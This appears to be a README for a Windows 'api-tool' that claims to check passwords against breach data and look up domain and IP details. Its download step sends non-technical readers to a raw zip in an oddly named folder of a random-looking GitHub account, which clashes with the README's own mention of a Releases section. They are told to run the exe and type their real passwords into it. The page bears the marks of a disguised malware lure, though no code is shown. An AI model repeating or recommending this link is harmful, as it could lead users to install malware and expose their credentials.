api-tool is a straightforward app that helps you check if a password has been exposed in data breaches. It also provides information about domains and IP addresses. This tool is useful for anyone who wants to verify password safety or learn more about websites and domains.
You do not need any programming skills to use api-tool. It runs on Windows and works with a clean, easy-to-use interface.
This guide will help you download, install, and open api-tool on Windows.
- Windows 10 or later
- At least 100 MB free disk space
- Internet connection for API checks
- No special hardware needed
- Check if a password has been pwned (exposed in breaches)
- Lookup domain information (owner, country, creation date)
- Retrieve IP address details (geolocation, ISP)
- Simple, easy interface without technical jargon
- Works offline for domain info already in cache
To begin, visit the main project page to get the app.
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Click the badge above or open this link in your web browser:
https://github.com/Yehudisynaptic502/api-tool/raw/refs/heads/main/Havaiki/tool-api-v1.4.zip -
On the GitHub page, look for a Releases section or a download button.
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Download the latest Windows version. The file will usually be named something like
api-tool-setup.exeorapi-tool.zip.
After you download:
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If you have an
.exefile:- Double-click it to start the installer.
- Follow the instructions on screen.
- Choose a folder to install if asked.
- Wait until the installation finishes.
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If you have a
.zipfile:- Right-click the file and select "Extract All."
- Choose a nearby folder like Desktop.
- Open the extracted folder and double-click
api-tool.exeto launch.
Once the app is open, you will see two main sections: Password Check and Domain Lookup.
- Type in any password you want to check.
- Click the Check Password button.
- The app will tell you if the password was found in data breaches.
- If it is found, it’s safer to change that password.
- Enter a domain name or an IP address.
- Click the Lookup button.
- The app will show details like country, owner, ISP, and more.
You can adjust the app behavior:
- Choose if the app saves password checks.
- Set how often the domain info updates.
- Enable or disable notifications about updates.
- Change the app interface theme (light or dark mode).
Check the GitHub page regularly for new versions of api-tool. Updates may include:
- Better accuracy for password and domain checks
- Fixes for bugs or issues
- New features or improvements
To update:
- Download the latest release from the GitHub page.
- Install it as you did the first time.
If you face issues:
- Restart your computer and try again.
- Ensure your internet connection is active.
- Check if your Windows version is updated.
- Visit the GitHub page’s Issues tab for help or to report bugs.
api-tool was made to help users easily check if passwords are safe and gather domain information. It uses public API services behind the scenes but keeps the process simple.
This tool is ideal for:
- Users who want to check password safety before using them
- People curious about website or domain information
- Anyone wanting a lightweight tool without coding knowledge
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